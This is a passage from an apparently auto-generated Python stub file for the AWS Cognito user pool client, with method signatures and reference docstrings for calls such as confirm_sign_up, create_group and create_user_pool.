**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The response from the server to the change password request.
:type PreviousPassword: string
:param PreviousPassword: **[REQUIRED]**
The old password.
:type ProposedPassword: string
:param ProposedPassword: **[REQUIRED]**
The new password.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token.
:rtype: dict
:returns:
"""
pass
def confirm_device(self, AccessToken: str, DeviceKey: str, DeviceSecretVerifierConfig: Dict = None, DeviceName: str = None) -> Dict:
"""
Confirms tracking of the device. This API call is the call that begins device tracking.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ConfirmDevice>`_
**Request Syntax**
::
response = client.confirm_device(
AccessToken='string',
DeviceKey='string',
DeviceSecretVerifierConfig={
'PasswordVerifier': 'string',
'Salt': 'string'
},
DeviceName='string'
)
**Response Syntax**
::
{
'UserConfirmationNecessary': True|False
}
**Response Structure**
- *(dict) --*
Confirms the device response.
- **UserConfirmationNecessary** *(boolean) --*
Indicates whether the user confirmation is necessary to confirm the device response.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token.
:type DeviceKey: string
:param DeviceKey: **[REQUIRED]**
The device key.
:type DeviceSecretVerifierConfig: dict
:param DeviceSecretVerifierConfig:
The configuration of the device secret verifier.
- **PasswordVerifier** *(string) --*
The password verifier.
- **Salt** *(string) --*
The salt.
:type DeviceName: string
:param DeviceName:
The device name.
:rtype: dict
:returns:
"""
pass
def confirm_forgot_password(self, ClientId: str, Username: str, ConfirmationCode: str, Password: str, SecretHash: str = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
"""
Allows a user to enter a confirmation code to reset a forgotten password.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ConfirmForgotPassword>`_
**Request Syntax**
::
response = client.confirm_forgot_password(
ClientId='string',
SecretHash='string',
Username='string',
ConfirmationCode='string',
Password='string',
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
},
UserContextData={
'EncodedData': 'string'
}
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The response from the server that results from a user's request to retrieve a forgotten password.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The app client ID of the app associated with the user pool.
:type SecretHash: string
:param SecretHash:
A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user for whom you want to enter a code to retrieve a forgotten password.
:type ConfirmationCode: string
:param ConfirmationCode: **[REQUIRED]**
The confirmation code sent by a user\'s request to retrieve a forgotten password. For more information, see
:type Password: string
:param Password: **[REQUIRED]**
The password sent by a user\'s request to retrieve a forgotten password.
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The Amazon Pinpoint analytics metadata for collecting metrics for ``ConfirmForgotPassword`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:type UserContextData: dict
:param UserContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **EncodedData** *(string) --*
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
:rtype: dict
:returns:
"""
pass
def confirm_sign_up(self, ClientId: str, Username: str, ConfirmationCode: str, SecretHash: str = None, ForceAliasCreation: bool = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
"""
Confirms registration of a user and handles the existing alias from a previous user.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ConfirmSignUp>`_
**Request Syntax**
::
response = client.confirm_sign_up(
ClientId='string',
SecretHash='string',
Username='string',
ConfirmationCode='string',
ForceAliasCreation=True|False,
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
},
UserContextData={
'EncodedData': 'string'
}
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server for the registration confirmation.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The ID of the app client associated with the user pool.
:type SecretHash: string
:param SecretHash:
A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user whose registration you wish to confirm.
:type ConfirmationCode: string
:param ConfirmationCode: **[REQUIRED]**
The confirmation code sent by a user\'s request to confirm registration.
:type ForceAliasCreation: boolean
:param ForceAliasCreation:
Boolean to be specified to force user confirmation irrespective of existing alias. By default set to ``False`` . If this parameter is set to ``True`` and the phone number/email used for sign up confirmation already exists as an alias with a different user, the API call will migrate the alias from the previous user to the newly created user being confirmed. If set to ``False`` , the API will throw an **AliasExistsException** error.
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The Amazon Pinpoint analytics metadata for collecting metrics for ``ConfirmSignUp`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:type UserContextData: dict
:param UserContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **EncodedData** *(string) --*
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
:rtype: dict
:returns:
"""
pass
def create_group(self, GroupName: str, UserPoolId: str, Description: str = None, RoleArn: str = None, Precedence: int = None) -> Dict:
"""
Creates a new group in the specified user pool.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateGroup>`_
**Request Syntax**
::
response = client.create_group(
GroupName='string',
UserPoolId='string',
Description='string',
RoleArn='string',
Precedence=123
)
**Response Syntax**
::
{
'Group': {
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **Group** *(dict) --*
The group object for the group.
- **GroupName** *(string) --*
The name of the group.
- **UserPoolId** *(string) --*
The user pool ID for the user pool.
- **Description** *(string) --*
A string containing the description of the group.
- **RoleArn** *(string) --*
The role ARN for the group.
- **Precedence** *(integer) --*
A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. If a user belongs to two or more groups, it is the group with the highest precedence whose role ARN will be used in the ``cognito:roles`` and ``cognito:preferred_role`` claims in the user's tokens. Groups with higher ``Precedence`` values take precedence over groups with lower ``Precedence`` values or with null ``Precedence`` values.
Two groups can have the same ``Precedence`` value. If this happens, neither group takes precedence over the other. If two groups with the same ``Precedence`` have the same role ARN, that role is used in the ``cognito:preferred_role`` claim in tokens for users in each group. If the two groups have different role ARNs, the ``cognito:preferred_role`` claim is not set in users' tokens.
The default ``Precedence`` value is null.
- **LastModifiedDate** *(datetime) --*
The date the group was last modified.
- **CreationDate** *(datetime) --*
The date the group was created.
:type GroupName: string
:param GroupName: **[REQUIRED]**
The name of the group. Must be unique.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Description: string
:param Description:
A string containing the description of the group.
:type RoleArn: string
:param RoleArn:
The role ARN for the group.
:type Precedence: integer
:param Precedence:
A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. Zero is the highest precedence value. Groups with lower ``Precedence`` values take precedence over groups with higher or null ``Precedence`` values. If a user belongs to two or more groups, it is the group with the lowest precedence value whose role ARN will be used in the ``cognito:roles`` and ``cognito:preferred_role`` claims in the user\'s tokens.
Two groups can have the same ``Precedence`` value. If this happens, neither group takes precedence over the other. If two groups with the same ``Precedence`` have the same role ARN, that role is used in the ``cognito:preferred_role`` claim in tokens for users in each group. If the two groups have different role ARNs, the ``cognito:preferred_role`` claim is not set in users\' tokens.
The default ``Precedence`` value is null.
:rtype: dict
:returns:
"""
pass
def create_identity_provider(self, UserPoolId: str, ProviderName: str, ProviderType: str, ProviderDetails: Dict, AttributeMapping: Dict = None, IdpIdentifiers: List = None) -> Dict:
"""
Creates an identity provider for a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateIdentityProvider>`_
**Request Syntax**
::
response = client.create_identity_provider(
UserPoolId='string',
ProviderName='string',
ProviderType='SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC',
ProviderDetails={
'string': 'string'
},
AttributeMapping={
'string': 'string'
},
IdpIdentifiers=[
'string',
]
)
**Response Syntax**
::
{
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **IdentityProvider** *(dict) --*
The newly created identity provider object.
- **UserPoolId** *(string) --*
The user pool ID.
- **ProviderName** *(string) --*
The identity provider name.
- **ProviderType** *(string) --*
The identity provider type.
- **ProviderDetails** *(dict) --*
The identity provider details, such as ``MetadataURL`` and ``MetadataFile`` .
- *(string) --*
- *(string) --*
- **AttributeMapping** *(dict) --*
A mapping of identity provider attributes to standard and custom user pool attributes.
- *(string) --*
- *(string) --*
- **IdpIdentifiers** *(list) --*
A list of identity provider identifiers.
- *(string) --*
- **LastModifiedDate** *(datetime) --*
The date the identity provider was last modified.
- **CreationDate** *(datetime) --*
The date the identity provider was created.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type ProviderName: string
:param ProviderName: **[REQUIRED]**
The identity provider name.
:type ProviderType: string
:param ProviderType: **[REQUIRED]**
The identity provider type.
:type ProviderDetails: dict
:param ProviderDetails: **[REQUIRED]**
The identity provider details, such as ``MetadataURL`` and ``MetadataFile`` .
- *(string) --*
- *(string) --*
:type AttributeMapping: dict
:param AttributeMapping:
A mapping of identity provider attributes to standard and custom user pool attributes.
- *(string) --*
- *(string) --*
:type IdpIdentifiers: list
:param IdpIdentifiers:
A list of identity provider identifiers.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def create_resource_server(self, UserPoolId: str, Identifier: str, Name: str, Scopes: List = None) -> Dict:
"""
Creates a new OAuth2.0 resource server and defines custom scopes in it.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateResourceServer>`_
**Request Syntax**
::
response = client.create_resource_server(
UserPoolId='string',
Identifier='string',
Name='string',
Scopes=[
{
'ScopeName': 'string',
'ScopeDescription': 'string'
},
]
)
**Response Syntax**
::
{
'ResourceServer': {
'UserPoolId': 'string',
'Identifier': 'string',
'Name': 'string',
'Scopes': [
{
'ScopeName': 'string',
'ScopeDescription': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ResourceServer** *(dict) --*
The newly created resource server.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that hosts the resource server.
- **Identifier** *(string) --*
The identifier for the resource server.
- **Name** *(string) --*
The name of the resource server.
- **Scopes** *(list) --*
A list of scopes that are defined for the resource server.
- *(dict) --*
A resource server scope.
- **ScopeName** *(string) --*
The name of the scope.
- **ScopeDescription** *(string) --*
A description of the scope.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Identifier: string
:param Identifier: **[REQUIRED]**
A unique resource server identifier for the resource server. This could be an HTTPS endpoint where the resource server is located. For example, ``https://my-weather-api.example.com`` .
:type Name: string
:param Name: **[REQUIRED]**
A friendly name for the resource server.
:type Scopes: list
:param Scopes:
A list of scopes. Each scope is map, where the keys are ``name`` and ``description`` .
- *(dict) --*
A resource server scope.
- **ScopeName** *(string) --* **[REQUIRED]**
The name of the scope.
- **ScopeDescription** *(string) --* **[REQUIRED]**
A description of the scope.
:rtype: dict
:returns:
"""
pass
def create_user_import_job(self, JobName: str, UserPoolId: str, CloudWatchLogsRoleArn: str) -> Dict:
"""
Creates the user import job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserImportJob>`_
**Request Syntax**
::
response = client.create_user_import_job(
JobName='string',
UserPoolId='string',
CloudWatchLogsRoleArn='string'
)
**Response Syntax**
::
{
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to create the user import job.
- **UserImportJob** *(dict) --*
The job object that represents the user import job.
- **JobName** *(string) --*
The job name for the user import job.
- **JobId** *(string) --*
The job ID for the user import job.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that the users are being imported into.
- **PreSignedUrl** *(string) --*
The pre-signed URL to be used to upload the ``.csv`` file.
- **CreationDate** *(datetime) --*
The date the user import job was created.
- **StartDate** *(datetime) --*
The date when the user import job was started.
- **CompletionDate** *(datetime) --*
The date when the user import job was completed.
- **Status** *(string) --*
The status of the user import job. One of the following:
* ``Created`` - The job was created but not started.
* ``Pending`` - A transition state. You have started the job, but it has not begun importing users yet.
* ``InProgress`` - The job has started, and users are being imported.
* ``Stopping`` - You have stopped the job, but the job has not stopped importing users yet.
* ``Stopped`` - You have stopped the job, and the job has stopped importing users.
* ``Succeeded`` - The job has completed successfully.
* ``Failed`` - The job has stopped due to an error.
* ``Expired`` - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
- **CloudWatchLogsRoleArn** *(string) --*
The role ARN for the Amazon CloudWatch Logging role for the user import job. For more information, see "Creating the CloudWatch Logs IAM Role" in the Amazon Cognito Developer Guide.
- **ImportedUsers** *(integer) --*
The number of users that were successfully imported.
- **SkippedUsers** *(integer) --*
The number of users that were skipped.
- **FailedUsers** *(integer) --*
The number of users that could not be imported.
- **CompletionMessage** *(string) --*
The message returned when the user import job is completed.
:type JobName: string
:param JobName: **[REQUIRED]**
The job name for the user import job.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that the users are being imported into.
:type CloudWatchLogsRoleArn: string
:param CloudWatchLogsRoleArn: **[REQUIRED]**
The role ARN for the Amazon CloudWatch Logging role for the user import job.
:rtype: dict
:returns:
"""
pass
def create_user_pool(self, PoolName: str, Policies: Dict = None, LambdaConfig: Dict = None, AutoVerifiedAttributes: List = None, AliasAttributes: List = None, UsernameAttributes: List = None, SmsVerificationMessage: str = None, EmailVerificationMessage: str = None, EmailVerificationSubject: str = None, VerificationMessageTemplate: Dict = None, SmsAuthenticationMessage: str = None, MfaConfiguration: str = None, DeviceConfiguration: Dict = None, EmailConfiguration: Dict = None, SmsConfiguration: Dict = None, UserPoolTags: Dict = None, AdminCreateUserConfig: Dict = None, Schema: List = None, UserPoolAddOns: Dict = None) -> Dict:
"""
Creates a new Amazon Cognito user pool and sets the password policy for the pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserPool>`_
**Request Syntax**
::
response = client.create_user_pool(
PoolName='string',
Policies={
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
LambdaConfig={
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
AutoVerifiedAttributes=[
'phone_number'|'email',
],
AliasAttributes=[
'phone_number'|'email'|'preferred_username',
],
UsernameAttributes=[
'phone_number'|'email',
],
SmsVerificationMessage='string',
EmailVerificationMessage='string',
EmailVerificationSubject='string',
VerificationMessageTemplate={
'SmsMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string',
'EmailMessageByLink': 'string',
'EmailSubjectByLink': 'string',
'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
},
SmsAuthenticationMessage='string',
MfaConfiguration='OFF'|'ON'|'OPTIONAL',
DeviceConfiguration={
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
EmailConfiguration={
'SourceArn': 'string',
'ReplyToEmailAddress': 'string',
'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
},
SmsConfiguration={
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
UserPoolTags={
'string': 'string'
},
AdminCreateUserConfig={
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
Schema=[
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
],
UserPoolAddOns={
'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
}
)
**Response Syntax**
::
{
'UserPool': {
'Id': 'string',
'Name': 'string',
'Policies': {
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
'LambdaConfig': {
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
'Status': 'Enabled'|'Disabled',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'SchemaAttributes': [
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
],
'AutoVerifiedAttributes': [
'phone_number'|'email',
],
'AliasAttributes': [
'phone_number'|'email'|'preferred_username',
],
'UsernameAttributes': [
'phone_number'|'email',
],
'SmsVerificationMessage': 'string',
'EmailVerificationMessage': 'string',
'EmailVerificationSubject': 'string',
'VerificationMessageTemplate': {
'SmsMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string',
'EmailMessageByLink': 'string',
'EmailSubjectByLink': 'string',
'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
},
'SmsAuthenticationMessage': 'string',
'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL',
'DeviceConfiguration': {
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
'EstimatedNumberOfUsers': 123,
'EmailConfiguration': {
'SourceArn': 'string',
'ReplyToEmailAddress': 'string',
'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
},
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
'UserPoolTags': {
'string': 'string'
},
'SmsConfigurationFailure': 'string',
'EmailConfigurationFailure': 'string',
'Domain': 'string',
'CustomDomain': 'string',
'AdminCreateUserConfig': {
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
'UserPoolAddOns': {
'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
},
'Arn': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to create a user pool.
- **UserPool** *(dict) --*
A container for the user pool details.
- **Id** *(string) --*
The ID of the user pool.
- **Name** *(string) --*
The name of the user pool.
- **Policies** *(dict) --*
The policies associated with the user pool.
- **PasswordPolicy** *(dict) --*
The password policy.
- **MinimumLength** *(integer) --*
The minimum length of the password policy that you have set. Cannot be less than 6.
- **RequireUppercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
- **RequireLowercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
- **RequireNumbers** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
- **RequireSymbols** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
- **LambdaConfig** *(dict) --*
The AWS Lambda triggers associated with the user pool.
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
- **Status** *(string) --*
The status of a user pool.
- **LastModifiedDate** *(datetime) --*
The date the user pool was last modified.
- **CreationDate** *(datetime) --*
The date the user pool was created.
- **SchemaAttributes** *(list) --*
A container with the schema attributes of a user pool.
- *(dict) --*
Contains information about the schema attribute.
- **Name** *(string) --*
A schema attribute of the name type.
- **AttributeDataType** *(string) --*
The attribute data type.
- **DeveloperOnlyAttribute** *(boolean) --*
Specifies whether the attribute type is developer only.
- **Mutable** *(boolean) --*
Specifies whether the value of the attribute can be changed.
For any user pool attribute that's mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- **Required** *(boolean) --*
Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
- **NumberAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the number type.
- **MinValue** *(string) --*
The minimum value of an attribute that is of the number data type.
- **MaxValue** *(string) --*
The maximum value of an attribute that is of the number data type.
- **StringAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the string type.
- **MinLength** *(string) --*
The minimum length.
- **MaxLength** *(string) --*
The maximum length.
- **AutoVerifiedAttributes** *(list) --*
Specifies the attributes that are auto-verified in a user pool.
- *(string) --*
- **AliasAttributes** *(list) --*
Specifies the attributes that are aliased in a user pool.
- *(string) --*
- **UsernameAttributes** *(list) --*
Specifies whether email addresses or phone numbers can be specified as usernames when a user signs up.
- *(string) --*
- **SmsVerificationMessage** *(string) --*
The contents of the SMS verification message.
- **EmailVerificationMessage** *(string) --*
The contents of the email verification message.
- **EmailVerificationSubject** *(string) --*
The subject of the email verification message.
- **VerificationMessageTemplate** *(dict) --*
The template for verification messages.
- **SmsMessage** *(string) --*
The SMS message template.
- **EmailMessage** *(string) --*
The email message template.
- **EmailSubject** *(string) --*
The subject line for the email message template.
- **EmailMessageByLink** *(string) --*
The email message template for sending a confirmation link to the user.
- **EmailSubjectByLink** *(string) --*
The subject line for the email message template for sending a confirmation link to the user.
- **DefaultEmailOption** *(string) --*
The default email option.
- **SmsAuthenticationMessage** *(string) --*
The contents of the SMS authentication message.
- **MfaConfiguration** *(string) --*
Can be one of the following values:
* ``OFF`` - MFA tokens are not required and cannot be specified during user registration.
* ``ON`` - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
* ``OPTIONAL`` - Users have the option when registering to create an MFA token.
- **DeviceConfiguration** *(dict) --*
The device configuration.
- **ChallengeRequiredOnNewDevice** *(boolean) --*
Indicates whether a challenge is required on a new device. Only applicable to a new device.
- **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
If true, a device is only remembered on user prompt.
- **EstimatedNumberOfUsers** *(integer) --*
A number estimating the size of the user pool.
- **EmailConfiguration** *(dict) --*
The email configuration.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
* If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
* If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
- **ReplyToEmailAddress** *(string) --*
The destination to which the receiver of the email should reply to.
- **EmailSendingAccount** *(string) --*
Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
COGNITO_DEFAULT
When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
DEVELOPER
When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
- **SmsConfiguration** *(dict) --*
The SMS configuration.
- **SnsCallerArn** *(string) --*
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
- **UserPoolTags** *(dict) --*
The tags that are assigned to the user pool. A tag is a label that you can apply to user pools to categorize and manage them in different ways, such as by purpose, owner, environment, or other criteria.
- *(string) --*
- *(string) --*
- **SmsConfigurationFailure** *(string) --*
The reason why the SMS configuration cannot send the messages to your users.
- **EmailConfigurationFailure** *(string) --*
The reason why the email configuration cannot send the messages to your users.
- **Domain** *(string) --*
Holds the domain prefix if the user pool has a domain associated with it.
- **CustomDomain** *(string) --*
A custom domain name that you provide to Amazon Cognito. This parameter applies only if you use a custom domain to host the sign-up and sign-in pages for your application. For example: ``auth.example.com`` .
For more information about adding a custom domain to your user pool, see `Using Your Own Domain for the Hosted UI <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-add-custom-domain.html>`__ .
- **AdminCreateUserConfig** *(dict) --*
The configuration for ``AdminCreateUser`` requests.
- **AllowAdminCreateUserOnly** *(boolean) --*
Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
- **UnusedAccountValidityDays** *(integer) --*
The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``"RESEND"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
.. note::
If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
- **InviteMessageTemplate** *(dict) --*
The message template to be used for the welcome message to new users.
See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
- **SMSMessage** *(string) --*
The message template for SMS messages.
- **EmailMessage** *(string) --*
The message template for email messages.
- **EmailSubject** *(string) --*
The subject line for email messages.
- **UserPoolAddOns** *(dict) --*
The user pool add-ons.
- **AdvancedSecurityMode** *(string) --*
The advanced security mode.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) for the user pool.
:type PoolName: string
:param PoolName: **[REQUIRED]**
A string used to name the user pool.
:type Policies: dict
:param Policies:
The policies associated with the new user pool.
- **PasswordPolicy** *(dict) --*
The password policy.
- **MinimumLength** *(integer) --*
The minimum length of the password policy that you have set. Cannot be less than 6.
- **RequireUppercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
- **RequireLowercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
- **RequireNumbers** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
- **RequireSymbols** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
:type LambdaConfig: dict
:param LambdaConfig:
The Lambda trigger configuration information for the new user pool.
.. note::
